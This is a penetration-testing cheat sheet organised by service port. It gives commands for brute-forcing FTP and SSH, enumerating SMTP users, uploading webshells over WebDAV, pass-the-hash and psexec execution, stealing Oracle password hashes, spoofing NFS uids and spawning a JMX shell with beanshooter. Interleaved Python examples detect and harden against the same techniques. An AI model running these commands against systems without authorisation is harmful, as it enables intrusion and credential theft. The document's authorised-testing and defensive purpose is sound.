# Login
ftp <ip>
# Anonymous login: after login use these creds [User:password]
anonymous:anonymous
anonymous:
ftp:ftp
# Anonymous login with nmap
nmap --script=ftp-anon -p21 <ip>
nmap -sC -sV -p21 <ip> # [better] ftp-anon is a default script
# Brute force login
hydra -L users.txt -P passwords.txt <ip> ftp
Search exploit for vulnerable version
22 - SSH
# Login with password
ssh <username>@<ip> # then type password
# Login with private key
ssh -i id_rsa <username>@<ip> # If private_key has passphrase you need to type it
# Crack passphrase
python ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=<wordlist>
# Brute force login
hydra -L users.txt -P passwords.txt <ip> ssh
If login with the private key fails and you are asked for the user's password instead, check the verbose output (-vv option) for errors. Make sure the matching public key is present in the user's authorized_keys file.
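To check the "key rejected, password prompt instead" case from the notes above, the following added example (not part of the original notes) compares the fingerprint of a public key against the entries of an authorized_keys file, the same SHA256 fingerprint `ssh-keygen -lf` prints, and flags the permission mistake that makes sshd's StrictModes silently ignore the file. The key blobs, file contents and modes are constructed for the demo; the function names are mine.

```python
import base64
import hashlib
import stat

# Constructed sample keys: structurally valid ssh-ed25519 wire blobs
# (length-prefixed "ssh-ed25519", then a 32-byte key), built here for the demo.
SAMPLE_BLOB = base64.b64encode(
    b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + bytes(range(32))
).decode()
OTHER_BLOB = base64.b64encode(
    b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + bytes(range(32, 64))
).decode()

PUBKEY_LINE = f"ssh-ed25519 {SAMPLE_BLOB} pentester@kali"   # our id_rsa.pub
AUTHORIZED_KEYS = (
    "# constructed authorized_keys of the target user\n"
    f"ssh-ed25519 {OTHER_BLOB} someone-else@box\n"
    f'command="/usr/bin/uptime",no-pty ssh-ed25519 {SAMPLE_BLOB} pentester@kali\n'
)

def fingerprint(pubkey_line):
    """OpenSSH SHA256 fingerprint: base64(sha256(key blob)) without padding."""
    fields = pubkey_line.split()
    # Options such as command="..." may precede the key type; locate the type.
    # (Simple split: options that themselves contain spaces are not handled.)
    for i, field in enumerate(fields):
        if field.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
            blob = base64.b64decode(fields[i + 1])
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("not a public key line")

def authorized_fingerprints(authorized_keys_text):
    """Map fingerprint -> authorized_keys line, skipping blanks and comments."""
    fps = {}
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            fps[fingerprint(line)] = line
        except ValueError:
            continue
    return fps

def key_is_authorized(pubkey_line, authorized_keys_text):
    """True when the key's fingerprint appears in authorized_keys (options ignored)."""
    return fingerprint(pubkey_line) in authorized_fingerprints(authorized_keys_text)

def permission_problems(modes):
    """modes: {path: st_mode}. With StrictModes (the default) sshd ignores
    authorized_keys when it or ~/.ssh is group/world writable and falls back
    to password auth, which is exactly the symptom described in the notes."""
    problems = []
    for path, mode in modes.items():
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append(f"{path} is group/world writable (mode {oct(mode & 0o777)})")
    return problems

if __name__ == "__main__":
    print(fingerprint(PUBKEY_LINE))
    print("authorized:", key_is_authorized(PUBKEY_LINE, AUTHORIZED_KEYS))
    print(permission_problems({"/home/user/.ssh/authorized_keys": 0o100664}))
```

On a live host, feed `os.stat(path).st_mode` for `~/.ssh` and `~/.ssh/authorized_keys` into `permission_problems`; the server side of the same check is visible in `/var/log/auth.log` as "Authentication refused: bad ownership or modes".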
25 - SMTP
Search exploit for vulnerable version
Retrieve the hostname of the server (domain name)
francesco@debian:~$ nc <ip> <port>
220 openmailbox.xyz ESMTP Postfix: Welcome. # Here (in the banner)
helo whatyouwant # helo command
250 openmailbox.xyz # Here
Username Bruteforce
Automation:
smtp-user-enum -U <wordlist> -t <ip>
Manual
francesco@debian:~$ nc <ip> <port>
220 openmailbox.xyz ESMTP Postfix: Welcome.
VRFY root
252 2.0.0 root # Output if user exists
VRFY idontexists
550 5.1.1 <idontexists>: Recipient address rejected: User unknown in local recipient table
Note: other commands can be used for the same purpose, such as RCPT TO.
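The VRFY exchange above leaves a clear trail on the server side. As an added example (not part of the original notes), this script parses Postfix-style smtpd log lines and flags clients that probe many unknown names with VRFY, which is what smtp-user-enum looks like from the defender's chair. The log lines are constructed in the format Postfix uses for rejected VRFY commands; the function names and the threshold are mine.

```python
import re
from collections import defaultdict

# Constructed sample lines in the style of Postfix's smtpd log: a rejected
# VRFY is logged as "NOQUEUE: reject: VRFY from host[ip]: 550 ...".
SAMPLE_LOG = """\
Jan  7 10:00:01 mail postfix/smtpd[2201]: connect from unknown[10.0.0.5]
Jan  7 10:00:02 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[10.0.0.5]: 550 5.1.1 <idontexists>: Recipient address rejected: User unknown in local recipient table; to=<idontexists> proto=SMTP helo=<whatyouwant>
Jan  7 10:00:02 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[10.0.0.5]: 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table; to=<admin> proto=SMTP helo=<whatyouwant>
Jan  7 10:00:03 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[10.0.0.5]: 550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table; to=<test> proto=SMTP helo=<whatyouwant>
Jan  7 10:00:03 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[10.0.0.5]: 550 5.1.1 <guest>: Recipient address rejected: User unknown in local recipient table; to=<guest> proto=SMTP helo=<whatyouwant>
Jan  7 10:00:04 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[10.0.0.5]: 550 5.1.1 <backup>: Recipient address rejected: User unknown in local recipient table; to=<backup> proto=SMTP helo=<whatyouwant>
Jan  7 10:00:04 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[10.0.0.5]: 550 5.1.1 <oracle>: Recipient address rejected: User unknown in local recipient table; to=<oracle> proto=SMTP helo=<whatyouwant>
Jan  7 10:05:00 mail postfix/smtpd[2210]: NOQUEUE: reject: VRFY from mx.partner.example[192.0.2.10]: 550 5.1.1 <typo>: Recipient address rejected: User unknown in local recipient table; to=<typo> proto=ESMTP helo=<mx.partner.example>
"""

# Client host/IP and the probed name from a rejected VRFY line.
VRFY_REJECT = re.compile(
    r"reject: VRFY from (?P<host>\S+)\[(?P<ip>[0-9a-fA-F.:]+)\]: 550 \S+ <(?P<user>[^>]*)>"
)

def vrfy_rejects_by_client(log_text):
    """Map client IP -> sorted distinct names it probed with VRFY and got 550 for."""
    probed = defaultdict(set)
    for line in log_text.splitlines():
        m = VRFY_REJECT.search(line)
        if m:
            probed[m.group("ip")].add(m.group("user"))
    return {ip: sorted(users) for ip, users in probed.items()}

def flag_enumeration(log_text, threshold=5):
    """Clients whose number of distinct unknown VRFY targets reaches the threshold.
    A single typo from a legitimate peer stays below it; a wordlist does not."""
    by_client = vrfy_rejects_by_client(log_text)
    return sorted(ip for ip, users in by_client.items() if len(users) >= threshold)

if __name__ == "__main__":
    for ip in flag_enumeration(SAMPLE_LOG):
        print(f"{ip}: VRFY enumeration, probed {vrfy_rejects_by_client(SAMPLE_LOG)[ip]}")
```

Successful VRFY replies (252) are not logged as rejects, so the count only reflects misses; on Postfix the command can be switched off entirely with `disable_vrfy_command = yes` in main.cf, after which the exchange above returns a 502 instead.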
80 - WebDav
With WebDAV you can upload files. Credentials are normally required.
# 1 tool - davtest
# Check which file types can be uploaded and are executed by the server
davtest -auth <user>:<password> -url http://<ip>/<webdav_path>
# Upload file
davtest --url http://<ip>/<webdav_path> -auth <user>:<password> -uploadfile webshell.asp -uploadloc /destination/webshell.asp
# 2 tool - cadaver
cadaver http://<ip>/<webdav_path> # then login.
# Use PUT command to upload file
139/445 - SMB | Samba
# List shared folders
smbclient --no-pass -L //<ip> # Null user
smbclient -U 'admin%pwd' -L //<ip> # (1) With credential
smbclient -U 'admin' -L //<ip> # (2) With credential [pwd omitted, then type it]
smbclient -U 'admin' --pw-nt-hash <hash> -L //<ip> # With hash (pass the hash)
# Obtain information (you can also enumerate users)
enum4linux -a [-u "<username>" -p "<passwd>"] <ip>
# Command execution (authenticated)
smbmap -H <ip> -u <user> -p <pass> -x 'ipconfig'
python3 psexec.py Administrator@<ip> # Or the exploit/windows/smb/psexec Metasploit module
Brute force login
Search exploit for vulnerable version
If SMBv1 is enabled: EternalBlue exploit (check with the nmap smb-protocols script)
1521 - ORACLE DB (TNS protocol)
Introduction
Oracle clients communicate with the database using the TNS protocol.
In Oracle DB a SID is specific to a database, it is unique in an environment and 'points' to one, and only one, database in an environment. A service name can be associated with one or more SIDs.
In a RAC environment each instance is uniquely named, yet all of them can be accessed through the SERVICE_NAME. [Oracle Real Application Cluster (RAC) is a "share-everything" database architecture in which two or more Oracle RAC nodes are clustered together and share the same memory]

| SID   | SERVICE_NAME |
|-------|--------------|
| test1 | test         |
| test2 | test         |

Both SIDs are associated with the SERVICE_NAME test, and if load balancing is configured the listener will 'balance' the workload across all SIDs. However, you can still connect to test1 alone: use its SID instead of the SERVICE_NAME.
[CVE-2012-3137] If you have a valid SID and the Oracle DB version is one of these (10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3), you can obtain the session key and salt for arbitrary users.
# enumerate database
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password> --basic-info
# open sql shell
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password> --sql-shell
# get hashed password when the account is not locked
odat passwordstealer -s <IP> -d <SID> -p <port> -U mobius -P <password> --get-passwords-not-locked
# read file (ex. ssh private key)
odat externaltable -s <IP> -d <SID> -p <port> -U mobius -P <password> --getFile /etc passwd passwd
# create file with cve-2018-3004 (ex. upload authorized key)
odat cve -s <IP> -d <SID> -p <port> -U mobius -P <password> --cve-2018-3004 /tmp/test "test"
# NOTE: there are many other things and techniques you can use with odat. Refer to the documentation
2049 - NFS
# Folder available to mount
showmount -e <ip>
# Mount
mount -t nfs <ip>:/test /mnt/folder
# Umount
umount /mnt/folder
# If you can't read/write inside the mounted folder, create a local user with the owning uid (or change an existing user's uid to it)
### ls -lna /mnt/folder
### drwxrwxr-x 6 777 1 4096 Jan 7 2018 QWERTY
# 1 method
useradd newuser
usermod -u 6 newuser
# 2 method
nano /etc/passwd # edit uid
# Note if it doesn't work, umount, edit uid, mount again
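The uid trick above works because the NFS server trusts whatever uid the client presents unless the export squashes it. As an added example (not from the original notes), this script audits an /etc/exports file for the options that decide that: `no_root_squash`, `rw` without `all_squash`, world-wide exports and `insecure`. The exports content is constructed for the demo and the function names are mine; the option semantics are those documented in exports(5).

```python
import re

# Constructed /etc/exports content for the demo (not taken from any real host).
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/srv/test      *(rw,sync,no_root_squash)
/srv/backup    10.0.0.0/24(rw,sync,root_squash,all_squash,anonuid=65534,anongid=65534)
/srv/pub       192.168.1.0/24(ro,sync)
/srv/scratch   *(rw,insecure)
"""

EXPORT_LINE = re.compile(r"^(?P<path>\S+)\s+(?P<clients>.*)$")
# One client spec: host or network, optionally followed by (opt,opt,...).
CLIENT_SPEC = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")

def parse_exports(text):
    """Return a list of (path, host, options) tuples, one per client spec.
    exportfs defaults (ro, root_squash, secure) apply when an option is absent."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        m = EXPORT_LINE.match(line)
        if not m:
            continue
        for spec in CLIENT_SPEC.finditer(m.group("clients")):
            opts = set(filter(None, (spec.group("opts") or "").split(",")))
            entries.append((m.group("path"), spec.group("host"), opts))
    return entries

def audit_exports(text):
    """Findings, one string each, for exports that trust the client too much."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append(f"{path} -> {host}: no_root_squash (remote root is root on the share)")
        if "rw" in opts and "all_squash" not in opts:
            findings.append(f"{path} -> {host}: rw without all_squash (client-chosen uids are trusted)")
        if host in ("*", "0.0.0.0/0"):
            findings.append(f"{path} -> {host}: exported to every client")
        if "insecure" in opts:
            findings.append(f"{path} -> {host}: insecure (mounts from ports above 1024 accepted)")
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

The `/srv/backup` entry is the hardened shape: every client uid, root included, is mapped to the anonymous uid/gid, so matching the directory owner's uid on the client (the useradd/usermod trick) no longer grants access.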
3306 - MYSQL
# Local without pass
mysql -u root
# Local with pass
mysql -u root -p
# Remote without pass
mysql -h <hostname> -u root
# Remote with pass
mysql -h <hostname> -u root -p
3389 - RDP
Tip: If you are not sure that a specific port runs RDP, check it with auxiliary/scanner/rdp/rdp_scanner or try to connect with xfreerdp.
5985,5986 - WinRM
Brute force login
Java RMI
# Tool: https://github.com/qtc-de/remote-method-guesser
rmg enum <ip> <port>
# Note: there are many other things and techniques you can use with rmg. Refer to the documentation
JMXRMI
# Find JMX port
nmap -sC -sV -p 45000 <ip>
[...]
PORT STATE SERVICE VERSION
45000/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| jmxrmi
[...]
TESTING
# Tool: https://github.com/qtc-de/beanshooter
# jconsole (/usr/lib/jvm/java-xxxxxx-openjdk-amd64/bin/jconsole)
# (Some JDKs don't include jconsole)
# Check credentials
jconsole # connect <hostname>:<port>. [without credentials]
# Enumerate configuration
beanshooter enum <ip> <jmx_port>
# The best way to get a shell is with tonka
# Creating a TemplateImpl payload object to abuse StandardMBean
beanshooter standard <ip> <jmx_port> tonka
# Spawns a shell. NOTE: this works even if the target host doesn't reach you
beanshooter tonka shell <ip> <jmx_port>
# Note: there are many other things and techniques you can use with beanshooter. Refer to the documentation
Beanshooter Tips
If your local Java version is higher than the Java version of the application server, the server cannot load the bytecode and throws an exception.
To find out which Java version the server is running, connect with jconsole, go to "VM Summary", find "VM Arguments" and look for "Boot class path".
Install with maven
My installation method (sdkman)
# https://sdkman.io/install
# 1 - Install sdkman
curl -s "https://get.sdkman.io" | bash
source "$HOME/.sdkman/bin/sdkman-init.sh"
sdk version
# 2 - Install jdk (ex. java 8) [choose based on the target]
sdk install java 8.0.275.hs-adpt
# 3 - Install maven
sdk install maven
# 4 - Check installation
mvn -v
Apache Maven 3.9.8
Java version: 1.8.0_275, vendor: AdoptOpenJDK, runtime: /home/kali/.sdkman/candidates/java/8.0.275.hs-adpt/jre
# 5 - Now you can install beanshooter
Other ports
Most of the services identified by the Nmap scan are easily recognizable; however, it's possible that a few open ports on a target system do not show a service banner. To learn more about these ports and the services running on them, we can perform banner grabbing with Netcat.